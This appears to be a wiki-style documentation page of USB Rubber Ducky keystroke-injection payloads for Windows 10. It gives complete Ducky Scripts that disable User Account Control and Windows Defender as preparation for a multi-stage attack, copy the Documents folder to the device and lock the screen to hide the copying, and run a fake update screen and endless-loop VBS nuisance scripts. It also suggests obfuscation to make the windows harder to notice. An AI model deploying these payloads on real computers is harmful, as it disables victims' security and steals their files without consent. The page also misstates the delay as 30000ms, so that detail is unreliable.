USB Rubber Ducky: Payloads
Summary
In this documentation we will show you examples for the usage of the USB Rubber Ducky on Windows 10 hosts. There are many of ready-made Ducky Scripts found at:
Requirements
- Article on the basics of the device: Hak5 Rubber Ducky
- If you need a different Rubber Ducky Firmware follow this guide: USB Rubber Ducky – Firmware Update.
- Ducky Script Quick Reference.
Description
All scripts have a DELAY 3000 at the start which means a delay of 30000ms / 30s to make sure that the target PC has time to set up the HID driver. This can potentially be reduced to DELAY 1000 depending on the target host. The scripts could be further improved by adding obfuscation methods to the code. Terminal windows can be changed in colour and size to make them less obvious and much harder to read. USB Rubber Ducky can also be used to play harmless pranks on your colleagues and friends. Just be sure to clue them in beforehand and don’t let them panic.
Hello World!
Firmware: Duck (Original)
Like in all programming languages a basic hello world can be used to get to know the basic functionalities of the system. The following code is used to make a Windows PC open notepad, write “Hello World!” in large letters and save the file to the default directory.
DELAY 3000 GUI d DELAY 2000 GUI r DELAY 500 STRING c:\windows\notepad.exe ENTER DELAY 1000 ALT o STRING f TAB TAB STRING 100 ENTER STRING Hello World! CTRL s STRING totallynotavirus.txt ENTER
Disable Windows Defender
Firmware: Duck (Original)
This script is used to disable Windows User Account Control first and then disable all functionalities of the Windows Defender. This could be potentially used to prepare for a second stage of a multi-stage attack. It makes heavy use of menu navigation (Arrow keys, Tabs) and the Windows 10 Search menu. The value of the DELAY commands could be further reduced if used on a fast target host. Note that the script leaves no open windows after concluding its actions.
DELAY 3000 REM Disabling User Account Control CTRL ESC DELAY 200 STRING uac DELAY 200 ENTER DELAY 500 LEFT DELAY 200 ENTER DELAY 200 TAB DELAY 200 DOWNARROW DELAY 200 DOWNARROW DELAY 200 DOWNARROW DELAY 200 TAB DELAY 200 ENTER DELAY 500 LEFT DELAY 200 ENTER DELAY 1000 REM Disabling Windows Defender CTRL ESC DELAY 200 STRING virus pro DELAY 200 ENTER DELAY 200 TAB DELAY 200 TAB DELAY 200 TAB DELAY 200 TAB DELAY 200 TAB DELAY 200 ENTER DELAY 200 SPACE DELAY 200 TAB DELAY 200 SPACE DELAY 200 TAB DELAY 200 SPACE DELAY 200 TAB DELAY 200 TAB DELAY 200 SPACE DELAY 200 ALT F4
Copy Documents Folder to Ducky
Firmware: Twin Duck
Before using this script, the USB Rubber Ducky must be updated with the Twin Duck firmware. Using this firmware, the Rubber Ducky acts both as a HID keyboard and a USB storage device. The script uses the Windows Run application to open the Documents directory and copies all its contents to the storage portion of the Ducky. Note that this script assumes that the storage device will be assigned the drive letter D and must be adjusted if reconnaissance shows another letter would be more likely. The script ends with locking the screen to better hide the copying process.
DELAY 3000 GUI d DELAY 300 GUI r DELAY 100 STRING documents DELAY 100 ENTER DELAY 100 CTRL a DELAY 100 CTRL c DELAY 100 ALT F4 DELAY 100 GUI r DELAY 300 STRING d:\ DELAY 100 ENTER DELAY 100 CTRL v DELAY 100 GUI D DELAY 100 GUI l
Fake Update Screen
Firmware: Duck (Original)
This script launches a website that fakes the Windows update screen in the systems default internet browser and sets it to Fullscreen mode. It can’t be easily exited by hitting the Escape-key and hitting the Enter-key results in a fake bluescreen.
DELAY 3000 GUI d DELAY 200 GUI r DELAY 200 STRING https://www.fakeupdate.net/win10ue/ ENTER DELAY 500 F11
Maximum Volume Autoplay Audio
Firmware: Duck (Original)
This script showcases how Ducky Script can use the console to create Visual Basic Script files (*.vbs) that can be used to create endless loops of code. It uses the command copy con
to create two script files. The first script file is used to create a Windows Media Player object to play a sound file from start to finish from a provided online source. The second script creates a Windows Script Host Shell object that gives the “Volume Up”-command in an endless loop. The only way to end these scripts is by using the task manager or by restarting the system.
DELAY 3000 GUI d DELAY 200 GUI r DELAY 200 STRING cmd ENTER DELAY 500 STRING del %tmp%\rickyou.vbs ENTER DELAY 200 STRING del %tmp%\volup.vbs ENTER DELAY 200 STRING cd %tmp% && copy con rickyou.vbs ENTER STRING While true ENTER STRING Dim oPlayer ENTER STRING Set oPlayer = CreateObject("WMPlayer.OCX") ENTER STRING oPlayer.URL = "http://tinyurl.com/s63ve48" ENTER STRING oPlayer.controls.play ENTER STRING While oPlayer.playState <> 1 ' 1 = Stopped ENTER STRING WScript.Sleep 100 ENTER STRING Wend ENTER STRING oPlayer.close ENTER STRING Wend ENTER DELAY 100 CTRL z ENTER STRING copy con volup.vbs ENTER STRING do ENTER STRING Set WshShell = CreateObject("WScript.Shell") ENTER STRING WshShell.SendKeys(chr(&hAF)) ENTER STRING loop ENTER CTRL z ENTER STRING start rickyou.vbs && volup.vbs ENTER STRING exit ENTER
Used Hardware
- USB Rubber Ducky
- Windows 10 PC
- Ubuntu Linux 20.04 Virtual Machine